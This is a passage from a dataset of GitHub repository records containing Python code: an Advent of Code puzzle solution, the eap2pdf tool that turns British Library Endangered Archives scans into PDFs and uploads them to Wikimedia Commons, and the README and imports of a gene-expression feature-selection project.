\nProgramming language used: Python.\n\nhttps://adventofcode.com/\n" }, { "alpha_fraction": 0.41542288661003113, "alphanum_fraction": 0.4689054787158966, "avg_line_length": 17.720930099487305, "blob_id": "47466d2384ecd4eaf2f7ef6c66b9ce425398d272", "content_id": "60c6768eb3d95ffbd0eedaf94ed1ae6ee4701412", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "no_license", "max_line_length": 40, "num_lines": 43, "path": "/Day 3/day3.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines, lhX, lhY, right, down):\n x = 0\n y = 0\n tree = 0\n\n while y < lhY-1:\n x += right\n y += down\n\n if(x >= lhX):\n x -= lhX\n\n if(lines[y][x] == \"#\"):\n tree += 1\n\n return tree\n\n\ndef part2(lines, lhX, lhY):\n x1 = part1(lines, lhX, lhY, 1, 1)\n x2 = part1(lines, lhX, lhY, 3, 1)\n x3 = part1(lines, lhX, lhY, 5, 1)\n x4 = part1(lines, lhX, lhY, 7, 1)\n x5 = part1(lines, lhX, lhY, 1, 2)\n\n return x1 * x2 * x3 * x4 * x5\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().splitlines()\n lhX = len(str(lines[0]))\n lhY = len(lines)\n\n p1 = part1(lines, lhX, lhY, 3, 1)\n p2 = part2(lines, lhX, lhY)\n\n print(f\"Part 1: {p1}\")\n print(f\"Part 2: {p2}\")\n\n\nif __name__ == \"__main__\":\n main()" } ]
12
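The Day 5 solution in the repo above implements the seat lookup as an explicit binary search. Equivalently, and this is an alternative sketch rather than the repo's approach, the whole boarding pass is one 10-bit binary number (B and R select the upper half, so they act as 1-bits), and row * 8 + column is simply that number:

    def seat_id(boarding_pass):
        # F/L -> 0, B/R -> 1; the full string read as binary is the seat ID
        return int(boarding_pass.translate(str.maketrans('FBLR', '0101')), 2)

    print(seat_id('FBFBBFFRLR'))  # 357 (row 44, column 5, the puzzle's worked example)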
omshivaprakash/eap2pdf
https://github.com/omshivaprakash/eap2pdf
95dc55efebafb73af511266a7edfc820ebf0d57f
05a0258b88c50389155ce289aa6146e765272289
170c730f147e32c9dcb20af06122701eb58fa2b4
refs/heads/master
2023-03-15T12:26:57.959278
2018-08-08T05:01:35
2018-08-08T05:01:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5025419592857361, "alphanum_fraction": 0.5144890546798706, "avg_line_length": 33.20869445800781, "blob_id": "4eef3b0712d07ecff7de0ddb4ed05f4e16018324", "content_id": "b53af23e38a889c05222665e4ba0f87d7c82dde0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3934, "license_type": "permissive", "max_line_length": 108, "num_lines": 115, "path": "/eap_download_cl.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import multiprocessing\nimport os\nimport sys\nimport time\nimport urllib.request\nfrom urllib.error import HTTPError\nfrom fpdf import FPDF\nimport PyPDF2\n\n\nclass EAPBookFetch:\n\n EAP_BASE_URL = 'https://images.eap.bl.uk'\n EAP_FILENAME = 'default.jpg'\n DEFAULT_HEIGHT = 1200\n DEFAULT_WIDTH = 1200 * 0.8\n JPEG_PATH = 'jpgs'\n PDF_PATH = 'pdfs'\n\n @staticmethod\n def join_url(*args):\n joined_url = ''\n for arg in args:\n joined_url = joined_url + arg + '/'\n return joined_url\n\n @staticmethod\n def set_rotate(angle):\n if angle == 90 or angle == 180 or angle == 270:\n return angle\n else:\n return 0\n\n def download_jpg(self, url):\n base_eap = url.split('/')[0]\n eap_url_for_entry = url.replace('/', '_')\n combined_url = self.join_url(self.EAP_BASE_URL, base_eap, eap_url_for_entry)\n pg = 1\n can_go = True\n file_list = []\n if not os.path.exists(self.JPEG_PATH):\n os.makedirs(self.JPEG_PATH)\n while can_go:\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.height) + ',' +\n str(self.DEFAULT_WIDTH), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n\n title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n pg = pg + 1\n print('Downloading ' + title)\n try:\n urllib.request.urlretrieve(dl_url, title)\n file_list.append(title)\n except HTTPError:\n can_go = False\n\n if self.type == 'p':\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.DEFAULT_WIDTH + 50, self.height + 50))\n pdf.add_page(orientation=self.type)\n else:\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.height + 50, self.DEFAULT_WIDTH + 50))\n pdf.add_page(orientation=self.type)\n\n for image in file_list:\n print('Adding ' + image + ' to PDF')\n if self.type == 'p':\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n else:\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n page_count = pdf.page_no()\n if not os.path.exists(self.PDF_PATH):\n os.makedirs(self.PDF_PATH)\n pdf.output(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n if page_count > len(file_list):\n # delete pg 1\n infile = PyPDF2.PdfFileReader(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n outfile = PyPDF2.PdfFileWriter()\n pg = 1\n print('Deleting blank page...')\n while pg < page_count:\n p = infile.getPage(pg)\n pg = pg + 1\n outfile.addPage(p)\n with open(os.path.join(self.PDF_PATH, eap_url_for_entry + '_nofirst.pdf'), 'wb') as f:\n outfile.write(f)\n try:\n os.remove(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n except OSError:\n pass\n\n def run(self):\n if len(sys.argv) < 2:\n raise Exception(\"No URL to download\")\n else:\n # shitty code, sorry\n if len(sys.argv) < 3:\n\n url = sys.argv[1]\n self.download_jpg(url)\n else:\n urls = []\n for arg in sys.argv:\n if arg.find(\"EAP\") != -1:\n urls.append(arg)\n pool = multiprocessing.Pool(processes=len(sys.argv) - 1)\n pool.map(self.download_jpg, urls)\n\n def __init__(self):\n self.rotation = 0\n self.height = self.DEFAULT_HEIGHT\n 
self.type = 'p' # probably broken for landscape\n\n\nif __name__ == '__main__':\n EAPBookFetch().run()\n" }, { "alpha_fraction": 0.5556599497795105, "alphanum_fraction": 0.5570690631866455, "avg_line_length": 38.425926208496094, "blob_id": "1261bda51903cc39acee4139c9f283db00ebe231", "content_id": "c2fc374b1be9f82b38c983b6874e19ea8848ed2b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2129, "license_type": "permissive", "max_line_length": 109, "num_lines": 54, "path": "/get_eap_entry.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import re\nimport _helpers\n\n\nclass EAPFileList:\n\n COLLECTIONS_FILE = 'collections.txt'\n EAP_FILE = 'eap_files.txt'\n URL_FOR_FILE = 'https://eap.bl.uk/archive-file/'\n URL_FOR_COLL = 'https://eap.bl.uk/collection/'\n\n def get_eap_list(self):\n with open(self.COLLECTIONS_FILE) as f:\n collections = f.read().splitlines()\n return collections\n\n def generate_download_list(self, collections):\n download_list = []\n for collection in collections:\n print('Now adding files from collection ' + collection + ' to download list...')\n converted_url = self.URL_FOR_FILE + collection.replace('/', '-')\n collection_conv_url = self.URL_FOR_COLL + collection.replace('/', '-')\n coll_exists, coll_content = _helpers.page_exists(collection_conv_url)\n if not coll_exists:\n print(collection + ' is not a collection')\n else:\n try:\n search_desc = coll_content.find(\"span\", class_='search-description').get_text()\n except AttributeError:\n print('No documents found in ' + collection_conv_url)\n continue\n total_results = re.search(\".*of(.*)results.*\", search_desc.replace(',', '')).group(1).strip()\n if not _helpers.page_exists(converted_url + '-' + total_results):\n print('This collection probably has sub-collections. Please use those instead')\n else:\n for i in range(1, int(total_results) + 1):\n download_list.append(collection.replace('-', '/') + '/' + str(i))\n return download_list\n\n def write_to_file(self, eap_link):\n with open(self.EAP_FILE, 'a') as f:\n for entry in eap_link:\n f.write(entry + '\\n')\n\n def run(self):\n collections = self.get_eap_list()\n if not collections:\n print('collections.txt is empty')\n else:\n self.write_to_file(self.generate_download_list(collections))\n\n\nif __name__ == '__main__':\n EAPFileList().run()\n" }, { "alpha_fraction": 0.6957295536994934, "alphanum_fraction": 0.7384341359138489, "avg_line_length": 36.53333282470703, "blob_id": "0ea7d1a4115845b0385d917767fc5fc9e04f503f", "content_id": "99053c11ce86c332c4142c03da0507a85eeecc9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 562, "license_type": "permissive", "max_line_length": 76, "num_lines": 15, "path": "/eap_conf.ini", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "[wiki]\nusername = YourUsernameHere\npwd = YourPasswordHere\nsummary = Uploaded via EAP2PDF\ntitle = Title to be shown in Commons page\nfilename = Actual filename of the document (without namespace or extension)\ndesc = Description\nauthor = Author name - can be {{Creator|}} template\ndate = Date of publication\nlicense = Licenses in form of template - e.g. {{PD-India}}{{PD-1923}}\n\n[download]\nurl = EAP number - e.g. 
EAP262/1/1/5\nrotation = Rotation of images - valid values are 0, 90, 180 and 270\nheight = Height in px of images in integer - in general 1200 is a good value" }, { "alpha_fraction": 0.7637185454368591, "alphanum_fraction": 0.7695287466049194, "avg_line_length": 54.32143020629883, "blob_id": "626c77cdbbd065d3d42d626068bd35f617983389", "content_id": "714da7c8cb02fe53626b8acb1d7091f5b7012537", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1549, "license_type": "permissive", "max_line_length": 159, "num_lines": 28, "path": "/README.md", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "# eap2pdf\n\nConverts books from EAP (eap.bl.uk) to PDF\n\n# Scripts\nThis repository has 2 scripts - one for mass downloading, the other for individual downloading and uploading to Wikimedia Commons.\n\n# Installation\n- Python 3.6\n- Clone repo\n- pip install -r requirements.txt\n\n# Mass downloader\n\n- The recommended mass downloader is **eap_download_mass.py**\n- To use this, first add all collections containing the books you want to download to collections.txt\n- Format for collections - EAPabc/x/y. Ensure that you're adding collections (note the URL) and not archive files or projects\n- Run *python3 get_eap_entry.py*. This is required only for the **first run**. This generates eap_files.txt.\n- Now run *python3 eap_download_mass.py*. Optionally add a limit on the number of books to be downloaded as an argument (defaults to 50)\n- This should download all PDFs to the pdfs/ folder. This also generates eap_done.txt, which is used to keep track of files you've already downloaded\n- The alternative file *eap_download_cl.py* allows more customization (e.g. rotation, orientation), but requires a command line input of files to be downloaded\n\n# Individual book uploader\n\n- The file for this is **eap_download_sel.py**\n- This relies on the **eap_conf.ini** file. 
All parameters are compulsory.\n- Run *python3 eap_download_sel.py* after completing the configuration file requirements\n- The file uploaded has the {{Book}} template auto-added along with [[Category:PDF-files in Bengali]]\n- License templates have to be specified or later edited manually\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5085271596908569, "avg_line_length": 36.94117736816406, "blob_id": "fd1c9c1e0710c5842fbabc13ee25a86a16582cc4", "content_id": "e4cf49d3bf3bffe97b3d083991434d7364d6ceb3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6450, "license_type": "permissive", "max_line_length": 110, "num_lines": 170, "path": "/eap_download_mass.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import multiprocessing\nimport os\nimport re\nimport sys\nimport urllib.request\nfrom urllib.error import HTTPError\nfrom fpdf import FPDF\nimport PyPDF2\nimport time\nimport _helpers\n\n\nclass EAPBookFetch:\n EAP_BASE_URL = 'https://images.eap.bl.uk'\n EAP_ARCHIVE_URL = 'https://eap.bl.uk/archive-file/'\n EAP_LIST_FILENAME = 'eap_files.txt'\n EAP_DONE_FILENAME = 'eap_done.txt'\n EAP_FILENAME = 'default.jpg'\n DEFAULT_HEIGHT = 1200\n DEFAULT_WIDTH = 1200 * 0.8\n JPEG_PATH = 'jpgs'\n PDF_PATH = 'pdfs'\n DELETE_ORIG_PDF = True\n\n @staticmethod\n def join_url(*args):\n joined_url = ''\n for arg in args:\n joined_url = joined_url + arg + '/'\n return joined_url\n\n @staticmethod\n def set_rotate(angle):\n if angle == 90 or angle == 180 or angle == 270:\n return angle\n else:\n return 0\n\n def download_jpg(self, url):\n base_eap = url.split('/')[0]\n eap_url_for_entry = url.replace('/', '_')\n combined_url = self.join_url(self.EAP_BASE_URL, base_eap, eap_url_for_entry)\n pg = 1\n can_go = True\n file_list = []\n if not os.path.exists(self.JPEG_PATH):\n os.makedirs(self.JPEG_PATH)\n while can_go:\n if self.type == 'p':\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.height) + ',' +\n str(self.DEFAULT_WIDTH), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n else:\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.DEFAULT_WIDTH) + ',' +\n str(self.height), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n print(dl_url)\n title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n if os.path.isfile(title):\n # if file exists, don't download iff next file also exists\n # note that this effectively means that we can't parallelize at a page level\n download_this = True\n while True:\n new_title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg + 1) + '.jpg')\n old_title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n if os.path.isfile(new_title):\n print('Skipping ' + old_title)\n file_list.append(old_title)\n pg = pg + 1\n download_this = False\n else:\n break\n if not download_this:\n continue\n pg = pg + 1\n print('Downloading ' + title)\n try:\n urllib.request.urlretrieve(dl_url, title)\n file_list.append(title)\n except HTTPError:\n can_go = False\n\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.height + 50, self.DEFAULT_WIDTH + 50))\n pdf.add_page(orientation=self.type)\n\n for image in file_list:\n print('Adding ' + image + ' to PDF')\n if self.type == 'p':\n pdf.image(image, h=self.DEFAULT_WIDTH, w=self.height)\n else:\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n page_count = pdf.page_no()\n 
if not os.path.exists(self.PDF_PATH):\n os.makedirs(self.PDF_PATH)\n pdf.output(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n\n if page_count > len(file_list):\n # delete pg 1\n infile = PyPDF2.PdfFileReader(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n outfile = PyPDF2.PdfFileWriter()\n pg = 1\n print('Deleting blank page...')\n while pg < page_count:\n p = infile.getPage(pg)\n pg = pg + 1\n outfile.addPage(p)\n exists, eap_file = _helpers.page_exists(self.EAP_ARCHIVE_URL + url.replace('/', '-'))\n if not exists:\n eap_filename = eap_url_for_entry\n else:\n eap_filename = eap_file.title.text.split('|')[0].strip()\n eap_filename = re.sub(r'[^\\w]', '', eap_filename)\n with open(os.path.join(self.PDF_PATH, eap_filename + '.pdf'), 'wb') as f:\n outfile.write(f)\n print('Writing to ' + eap_filename + '.pdf')\n with open(self.EAP_DONE_FILENAME, 'a') as f:\n f.write(url + '\\n')\n if self.DELETE_ORIG_PDF:\n try:\n os.remove(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n except OSError:\n pass\n\n def run(self):\n\n if len(sys.argv) < 2:\n print(\"Limiting number of files downloaded to 50\")\n else:\n try:\n self.dl_count = int(sys.argv[2])\n except ValueError:\n pass\n\n try:\n with open(self.EAP_DONE_FILENAME) as f:\n urls_done = f.read().splitlines()\n except FileNotFoundError:\n urls_done = []\n open(self.EAP_DONE_FILENAME, 'w')\n\n try:\n with open(self.EAP_LIST_FILENAME) as f:\n urls = f.read().splitlines()\n except FileNotFoundError:\n urls = []\n open(self.EAP_LIST_FILENAME, 'w')\n\n urls_not_done = list(set(urls) - set(urls_done))[::-1]\n if not urls_not_done:\n print('No remaining file in list to download')\n return 0\n if len(urls_not_done) >= self.dl_count:\n urls_not_done = urls_not_done[0:self.dl_count]\n\n pool = multiprocessing.Pool(processes=len(urls_not_done))\n pool.map(self.download_jpg, urls_not_done)\n return len(urls_not_done)\n\n def __init__(self):\n self.rotation = 0\n self.height = self.DEFAULT_HEIGHT\n self.type = 'l' # probably broken for landscape\n self.dl_count = 50\n\n\nif __name__ == '__main__':\n start_time = time.time()\n downloaded = EAPBookFetch().run()\n elapsed_time_secs = time.time() - start_time\n print(\"Downloaded \" + str(downloaded) + \" files in \" + str(elapsed_time_secs) + \" seconds\")\n" }, { "alpha_fraction": 0.4646247923374176, "alphanum_fraction": 0.4700734615325928, "avg_line_length": 40.3412971496582, "blob_id": "52a9a460513864d9a2886285fda15b6a9d0022d4", "content_id": "284f2b36fcb440302e83150fd4204e3f7c4d4077", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12129, "license_type": "permissive", "max_line_length": 135, "num_lines": 293, "path": "/eap_download_sel.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import requests\nimport os\nimport re\nimport configparser\nimport urllib.request\nfrom urllib.error import HTTPError\nfrom fpdf import FPDF\nimport PyPDF2\nimport time\nimport _helpers\n\n\nclass EAPBookFetch:\n EAP_BASE_URL = 'https://images.eap.bl.uk'\n EAP_ARCHIVE_URL = 'https://eap.bl.uk/archive-file/'\n EAP_CONFIG_FILENAME = 'eap_conf.ini'\n EAP_FILENAME = 'default.jpg'\n DEFAULT_HEIGHT = 1200\n DEFAULT_WIDTH = 1200 * 0.8\n JPEG_PATH = 'jpgs'\n PDF_PATH = 'pdfs'\n API_BASE_URL = 'https://commons.wikimedia.org/w/api.php'\n CHUNK_SIZE = 1000000\n\n @staticmethod\n def join_url(*args):\n joined_url = ''\n for arg in args:\n joined_url = joined_url + arg + '/'\n return joined_url\n\n @staticmethod\n 
def set_rotate(angle):\n if angle == 90 or angle == 180 or angle == 270:\n return angle\n else:\n return 0\n\n def download_jpg(self):\n base_eap = self.url.split('/')[0]\n eap_url_for_entry = self.url.replace('/', '_')\n combined_url = self.join_url(self.EAP_BASE_URL, base_eap, eap_url_for_entry)\n pg = 1\n can_go = True\n file_list = []\n if not os.path.exists(self.JPEG_PATH):\n os.makedirs(self.JPEG_PATH)\n while can_go:\n if self.type == 'p':\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.height) + ',' +\n str(self.DEFAULT_WIDTH), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n else:\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.DEFAULT_WIDTH) + ',' +\n str(self.height), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n\n title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n pg = pg + 1\n print('Downloading ' + title)\n try:\n urllib.request.urlretrieve(dl_url, title)\n file_list.append(title)\n except HTTPError as e:\n print(e)\n print(dl_url)\n can_go = False\n\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.height + 50, self.DEFAULT_WIDTH + 50))\n pdf.add_page(orientation=self.type)\n\n for image in file_list:\n print('Adding ' + image + ' to PDF')\n if self.type == 'p':\n pdf.image(image, h=self.DEFAULT_WIDTH, w=self.height)\n else:\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n\n page_count = pdf.page_no()\n if not os.path.exists(self.PDF_PATH):\n os.makedirs(self.PDF_PATH)\n pdf.output(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n\n if page_count > len(file_list):\n # delete pg 1\n infile = PyPDF2.PdfFileReader(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n outfile = PyPDF2.PdfFileWriter()\n pg = 1\n print('Deleting blank page...')\n while pg < page_count:\n p = infile.getPage(pg)\n pg = pg + 1\n outfile.addPage(p)\n exists, eap_file = _helpers.page_exists(self.EAP_ARCHIVE_URL + self.url.replace('/', '-'))\n if not exists:\n eap_filename = eap_url_for_entry\n else:\n eap_filename = eap_file.title.text.split('|')[0].strip()\n eap_filename = re.sub(r'[^\\w]', '', eap_filename)\n with open(os.path.join(self.PDF_PATH, eap_filename + '.pdf'), 'wb') as f:\n outfile.write(f)\n print('Writing to ' + eap_filename + '.pdf')\n try:\n os.remove(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n except OSError:\n pass\n return eap_filename\n return ''\n\n def read_config(self):\n config_parser = configparser.ConfigParser()\n config_parser.read(self.EAP_CONFIG_FILENAME, encoding='utf8')\n self.url = config_parser.get('download', 'url')\n if config_parser.has_option('download', 'rotation'):\n try:\n self.rotation = int(config_parser.get('download', 'rotation'))\n except ValueError:\n self.rotation = 0\n if config_parser.has_option('download', 'height'):\n try:\n self.height = int(config_parser.get('download', 'height'))\n except ValueError:\n self.height = 1200\n if config_parser.has_option('download', 'orientation'):\n self.type = config_parser.get('download', 'orientation') # does not work!\n try:\n self.username = config_parser.get('wiki', 'username')\n self.password = config_parser.get('wiki', 'pwd')\n if config_parser.has_option('wiki', 'summary'):\n self.summary = config_parser.get('wiki', 'summary')\n self.title = config_parser.get('wiki', 'title')\n self.filename = config_parser.get('wiki', 'filename')\n self.description = config_parser.get('wiki', 'desc')\n self.author = 
config_parser.get('wiki', 'author')\n self.license = config_parser.get('wiki', 'license')\n self.date = config_parser.get('wiki', 'date')\n except Exception:\n pass\n\n def get_token(self):\n session = requests.Session()\n login_t = session.get(self.API_BASE_URL, params={\n 'format': 'json',\n 'action': 'query',\n 'meta': 'tokens',\n 'type': 'login',\n })\n login_t.raise_for_status()\n login = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'login',\n 'lgname': self.username,\n 'lgpassword': self.password,\n 'lgtoken': login_t.json()['query']['tokens']['logintoken'],\n })\n if login.json()['login']['result'] != 'Success':\n raise RuntimeError(login.json()['login']['reason'])\n\n # get edit token\n tokens = session.get(self.API_BASE_URL, params={\n 'format': 'json',\n 'action': 'query',\n 'meta': 'tokens',\n })\n return session, tokens.json()['query']['tokens']['csrftoken']\n\n def upload_file(self, session, filename):\n can_go = True\n filename = os.path.join(self.PDF_PATH, filename + '.pdf')\n filekey = ''\n filesize = os.path.getsize(filename)\n print(self.token)\n offset = 0\n i = 1\n page_content = \"=={{int:filedesc}}==\\n\" + \\\n \"{{Book\\n\" + \\\n \"| Author = \" + self.author + \"\\n\" + \\\n \"| Title = \" + self.title + \"\\n\" + \\\n \"| Date = \" + self.date + \"\\n\" + \\\n \"| Language = {{language|bn}}\\n\" + \\\n \"| Wikisource = s:bn:নির্ঘণ্ট:{{PAGENAME}}\\n\" + \\\n \"| Description = \" + self.description + \"\\n\" + \\\n \"| Source = {{Endangered Archives Programme|url=\" + self.EAP_ARCHIVE_URL + self.url.replace('/', '-') + \\\n \"}}{{Institution:British Library}}\\n\" + \\\n \"| Image = {{PAGENAME}}\\n\" + \\\n \"}}\\n\" + \\\n \"=={{int:license-header}}==\\n\" + self.license + \"\\n\" + \\\n \"[[Category:Uploaded with eap2pdf]]\\n\" + \\\n \"[[Category:PDF-files in Bengali]]\"\n with open(filename, 'rb') as f:\n while can_go:\n chunk = f.read(self.CHUNK_SIZE)\n if offset == 0:\n upload = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'upload',\n 'filename': self.filename + '.pdf',\n 'filesize': filesize,\n 'offset': offset,\n 'chunk': chunk,\n 'token': self.token\n }, files={'chunk': chunk,\n 'filename': self.filename + '.pdf'})\n print('Uploaded ' + str(i) + ' MB...')\n i = i + 1\n try:\n filekey = upload.json()['upload']['filekey']\n except (KeyError, NameError):\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n else:\n upload = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'upload',\n 'filename': self.filename + '.pdf',\n 'filesize': filesize,\n 'filekey': filekey,\n 'offset': offset,\n 'chunk': chunk,\n 'token': self.token\n }, files={'chunk': chunk,\n 'filename': self.filename + '.pdf'})\n print('Uploaded ' + str(i) + ' MB...')\n i = i + 1\n try:\n filekey = upload.json()['upload']['filekey']\n except (KeyError, NameError):\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n if upload.json()['upload']['result'] == 'Success':\n done = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'upload',\n 'filename': self.filename + '.pdf',\n 'filekey': filekey,\n 'comment': self.summary,\n 'token': self.token,\n 'text': page_content\n }, files={'filename': self.filename + '.pdf'})\n if 'error' in done.json():\n raise RuntimeError('Could not complete upload. 
You probably got caught by an abuse filter')\n else:\n print('Done!')\n break\n elif upload.json()['upload']['result'] == 'Continue':\n try:\n offset = upload.json()['upload']['offset']\n except (KeyError, NameError):\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n else:\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n\n def run(self):\n try:\n with open(self.EAP_CONFIG_FILENAME):\n self.read_config()\n except FileNotFoundError:\n print('No configuration file found!')\n return 0\n filename = self.download_jpg()\n try:\n session, self.token = self.get_token()\n self.upload_file(session, filename)\n except (RuntimeError, HTTPError) as e:\n print(e)\n print('Could not upload file. Please verify your credentials.')\n\n return 1\n\n def __init__(self):\n self.rotation = 0\n self.height = self.DEFAULT_HEIGHT\n self.type = 'l' # probably broken for landscape\n self.url = ''\n self.username = ''\n self.password = ''\n self.summary = 'Uploaded via EAP2PDF'\n self.title = ''\n self.description = ''\n self.author = ''\n self.token = ''\n self.date = ''\n self.license = ''\n self.filename = ''\n\n\nif __name__ == '__main__':\n start_time = time.time()\n downloaded = EAPBookFetch().run()\n elapsed_time_secs = time.time() - start_time\n print(\"Uploaded \" + str(downloaded) + \" files in \" + str(elapsed_time_secs) + \" seconds\")\n" } ]
6
ZLX1/RLSDSPCA
https://github.com/ZLX1/RLSDSPCA
32edd84431ed3a90f23d3c225e64ba7b8ce8ad90
ce9914a097c232a48bc463483e12aac8419f0aae
7497e7d908077c8b6c9eb7157462581b58be79c2
refs/heads/main
2023-04-03T08:01:05.398451
2021-04-12T04:44:52
2021-04-12T04:44:52
357,205,786
0
0
null
2021-04-12T13:32:43
2021-04-12T04:44:53
2021-04-12T04:44:52
null
[ { "alpha_fraction": 0.7230320572853088, "alphanum_fraction": 0.7638484239578247, "avg_line_length": 127.625, "blob_id": "3f51a5e5c90c95be05c56a8197c8624f0417cffa", "content_id": "beb43f900b947967a6bd65cfc85d7e44e7af8a9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2070, "license_type": "no_license", "max_line_length": 755, "num_lines": 16, "path": "/README.md", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "# RLSDSPCA\n\n## (I) Datasets\nThree different types of gene expression data including Cholangiocarcinoma (CHOL), Head and Neck squamous cell carcinoma (HNSCC), and Pancreatic adenocarcinoma (PAAD) from TCGA. The CHOL dataset includes 45 samples (9 normal samples, 36 cancer samples), 20502 genes; the HNSCC dataset consists of 418 samples (20 normal samples, 398 cancer samples), 20502 genes; the PAAD dataset contains 180 samples, 20502 genes (4 normal samples, 176 cancer samples). The number of genes in the gene expression data of the three different cancer types is same, we integrate the three types of gene expression data in the sample direction to form a multi-source gene expression data that have four categories (normal samples and three different types of cancer samples).\nThe datasets of gene expression for characteristic gene selection and tumor classification were obtained from The Cancer Genome Atlas (TCGA, https://portal.gdc.cancer.gov/) database.\n## (II) Model file\nPCA,gLPCA,gLSPCA,RgLPCA,SDSPCA. The code of the comparision methods and featureselection can be obtained in model file\n## (III) plot file\nThe code of figure plot can be obtained in plot file\n## (IV) methods references\n#### [1] I. Jolliffe, “Principal component analysis,” Technometrics, vol. 45, no. 3, pp. 276, 2003.\n#### [2]C.-M. Feng, Y. Xu, J.-X. Liu, Y.-L. Gao, and C.-H. Zheng, “Supervised discriminative sparse PCA for com-characteristic gene selection and tumor classification on multiview biological data,” IEEE transactions on neural networks and learning systems, vol. 30, no. 10, pp. 2926-2937, 2019.\n#### [3]B. Jiang, C. Ding, and J. Tang, \"Graph-Laplacian PCA: Closed-form solution and robustness.\" pp. 3492-3498.\n#### [4]C.-M. Feng, Y. Xu, M.-X. Hou, L.-Y. Dai, and J.-L. Shang, “PCA via joint graph Laplacian and sparse constraint: Identification of differentially expressed genes and sample clustering on gene expression data,” BMC bioinformatics, vol. 20, no. 22, pp. 1-11, 2019.\n## (V) Contact \nIf you have any suggestions/questions about the work, PLEASE contact with us. 
E-mail: [email protected]\n" }, { "alpha_fraction": 0.7443056702613831, "alphanum_fraction": 0.7501837015151978, "avg_line_length": 33.8684196472168, "blob_id": "ccd8768895b41350970bf33d9616d9792f2b966c", "content_id": "807d866bc897742c6a0091e4489550723ddd2d15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1361, "license_type": "no_license", "max_line_length": 105, "num_lines": 38, "path": "/model/FeatureSelection.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics 